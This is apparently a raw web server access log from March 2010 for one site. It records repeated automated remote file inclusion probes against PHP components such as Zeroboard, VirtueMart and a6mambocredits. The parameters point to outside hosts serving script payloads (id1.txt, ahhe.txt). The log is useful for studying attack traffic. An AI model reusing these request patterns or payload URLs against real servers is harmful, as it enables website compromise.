218.145.31.239 - - [11/Mar/2010:10:08:52 -0800] "GET /logs/access_091228.log//bbs//skin/zero_vote/ask_password.php/?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.247.160.130 - - [11/Mar/2010:10:08:53 -0800] "GET //bbs//download.php?board_skin_path=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.247.160.130 - - [11/Mar/2010:10:08:53 -0800] "GET /logs/access.log///bbs//download.php?board_skin_path=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.247.160.130 - - [11/Mar/2010:10:08:53 -0800] "GET /logs///bbs//download.php?board_skin_path=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:10:09:03 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:10:09:03 -0800] "GET /logs/access_100224.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:10:09:03 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.247.160.130 - - [11/Mar/2010:10:09:44 -0800] "GET /logs/access.log///bbs//download.php?board_skin_path=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.247.160.130 - - [11/Mar/2010:10:09:44 -0800] "GET /logs///bbs//download.php?board_skin_path=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.247.160.130 - - [11/Mar/2010:10:09:44 -0800] "GET //bbs//download.php?board_skin_path=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.247.160.130 - - [11/Mar/2010:10:09:52 -0800] "GET //bbs//download.php?board_skin_path=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.247.160.130 - - [11/Mar/2010:10:09:52 -0800] "GET /logs///bbs//download.php?board_skin_path=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.247.160.130 - - [11/Mar/2010:10:09:52 -0800] "GET /logs/access.log///bbs//download.php?board_skin_path=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.145.31.239 - - [11/Mar/2010:10:10:41 -0800] "GET /logs/access.log///bbs//delete_all.php?board_skin_path=http://www.emotions.com.mx/libreria/joomla??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.145.31.239 - - [11/Mar/2010:10:10:41 -0800] "GET //bbs//delete_all.php?board_skin_path=http://www.emotions.com.mx/libreria/joomla??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.145.31.239 - - [11/Mar/2010:10:10:41 -0800] "GET /logs///bbs//delete_all.php?board_skin_path=http://www.emotions.com.mx/libreria/joomla??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
218.145.31.239 - - [11/Mar/2010:10:11:36 -0800] "GET /logs/access_091228.log///bbs//delete_all.php?board_skin_path=http://www.emotions.com.mx/libreria/joomla??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:10:12:48 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.247.160.130 - - [11/Mar/2010:10:12:52 -0800] "GET //bbs//download.php?board_skin_path=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.247.160.130 - - [11/Mar/2010:10:12:52 -0800] "GET /logs/access.log///bbs//download.php?board_skin_path=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.247.160.130 - - [11/Mar/2010:10:12:52 -0800] "GET /logs///bbs//download.php?board_skin_path=http://www.ingenieriacomercial.com/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:10:13:15 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:18:33 -0800] "GET //bbs//download.php?board_skin_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:18:34 -0800] "GET /logs/access.log///bbs//download.php?board_skin_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:18:37 -0800] "GET /logs///bbs//download.php?board_skin_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
213.175.197.86 - - [11/Mar/2010:10:19:02 -0800] "GET /logs/access.log//skin/ggambo_gallery/write.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
213.175.197.86 - - [11/Mar/2010:10:19:02 -0800] "GET /logs//skin/ggambo_gallery/write.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
213.175.197.86 - - [11/Mar/2010:10:19:02 -0800] "GET /skin/ggambo_gallery/write.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:19:24 -0800] "GET //bbs//download.php?board_skin_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:19:24 -0800] "GET /logs///bbs//download.php?board_skin_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
200.93.147.154 - - [11/Mar/2010:10:19:32 -0800] "GET /logs/access.log///bbs//download.php?board_skin_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:10:19:52 -0800] "GET ////?path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 200 781 "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:10:19:52 -0800] "GET /logs/access.log/////?path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:10:19:52 -0800] "GET /logs/////?path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 200 1518 "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:10:20:48 -0800] "GET /logs/access_100224.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:10:21:28 -0800] "GET /logs/access_100224.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:10:24:43 -0800] "GET ////?_zb_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 200 781 "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:10:24:43 -0800] "GET /logs/access.log/////?_zb_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:10:24:43 -0800] "GET /logs/////?_zb_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 200 1518 "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:10:25:10 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:10:25:29 -0800] "GET ////?path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 200 781 "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:10:25:29 -0800] "GET /logs/access.log%20%20/////?path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
124.136.23.172 - - [11/Mar/2010:10:25:29 -0800] "GET /logs/////?path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 200 1518 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:10:28:03 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:10:28:03 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:10:28:03 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:10:28:04 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:10:28:04 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:10:28:04 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:10:28:05 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:10:28:05 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:10:28:05 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:10:29:32 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:10:31:21 -0800] "GET /logs/access.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:10:31:43 -0800] "GET /logs/access.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:10:31:52 -0800] "GET /logs/access.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:10:31:56 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:10:31:56 -0800] "GET /logs/access_100224.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:10:31:56 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:10:32:02 -0800] "GET /logs/access_100225.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:10:32:33 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:10:32:33 -0800] "GET /logs/access_100224.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:10:32:33 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:10:32:55 -0800] "GET /logs/access_100121.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:10:33:13 -0800] "GET /logs/access_100225.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:10:33:21 -0800] "GET /logs/access_100121.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
64.15.158.246 - - [11/Mar/2010:10:33:30 -0800] "GET /logs/access_100121.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
85.236.48.245 - - [11/Mar/2010:10:33:52 -0800] "GET /logs//class/class.dashboard_cms.php?where_framework=http://nic.bupt.edu.cn/media/ahhe.txt??? HTTP/1.1" 404 - "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.hellionindustries.com"
85.236.48.245 - - [11/Mar/2010:10:33:52 -0800] "GET /class/class.dashboard_cms.php?where_framework=http://nic.bupt.edu.cn/media/ahhe.txt??? HTTP/1.1" 404 - "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.hellionindustries.com"
77.222.56.28 - - [11/Mar/2010:10:37:07 -0800] "GET /logs//class/class.dashboard_cms.php?where_framework=http://nic.bupt.edu.cn/media/ahhe.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.hellionindustries.com"
190.152.217.250 - - [11/Mar/2010:10:38:16 -0800] "GET /logs///bbs//download.php?board_skin_path=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
190.152.217.250 - - [11/Mar/2010:10:38:16 -0800] "GET /logs/access.log///bbs//download.php?board_skin_path=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
190.152.217.250 - - [11/Mar/2010:10:38:16 -0800] "GET //bbs//download.php?board_skin_path=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
190.152.217.250 - - [11/Mar/2010:10:39:25 -0800] "GET //bbs//download.php?board_skin_path=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
190.152.217.250 - - [11/Mar/2010:10:39:25 -0800] "GET /logs///bbs//download.php?board_skin_path=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
190.152.217.250 - - [11/Mar/2010:10:39:33 -0800] "GET /logs/access.log///bbs//download.php?board_skin_path=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
190.152.217.250 - - [11/Mar/2010:10:42:13 -0800] "GET /logs/access.log///bbs//download.php?board_skin_path=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
190.152.217.250 - - [11/Mar/2010:10:42:13 -0800] "GET //bbs//download.php?board_skin_path=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
190.152.217.250 - - [11/Mar/2010:10:42:13 -0800] "GET /logs///bbs//download.php?board_skin_path=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:10:42:49 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:10:42:49 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:10:42:49 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:10:45:07 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:10:45:07 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:10:45:07 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
190.152.217.250 - - [11/Mar/2010:10:53:38 -0800] "GET /logs/access_091228.log///bbs//download.php?board_skin_path=http://www.huacabrava.com/media/sh404_upgrade_conf_security/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:10:56:50 -0800] "GET /logs/access_100224.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:10:56:50 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:10:56:50 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:10:56:56 -0800] "GET /logs/access_100225.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:10:56:59 -0800] "GET /logs/access_100224.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:10:56:59 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:10:56:59 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.133.120 - - [11/Mar/2010:10:57:06 -0800] "GET /logs/access_100225.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:11:00:10 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:11:00:10 -0800] "GET /logs/access_100224.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:11:00:10 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
121.101.214.54 - - [11/Mar/2010:11:00:18 -0800] "GET /logs/access_100225.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
87.236.196.199 - - [11/Mar/2010:11:00:25 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
87.236.196.199 - - [11/Mar/2010:11:00:25 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
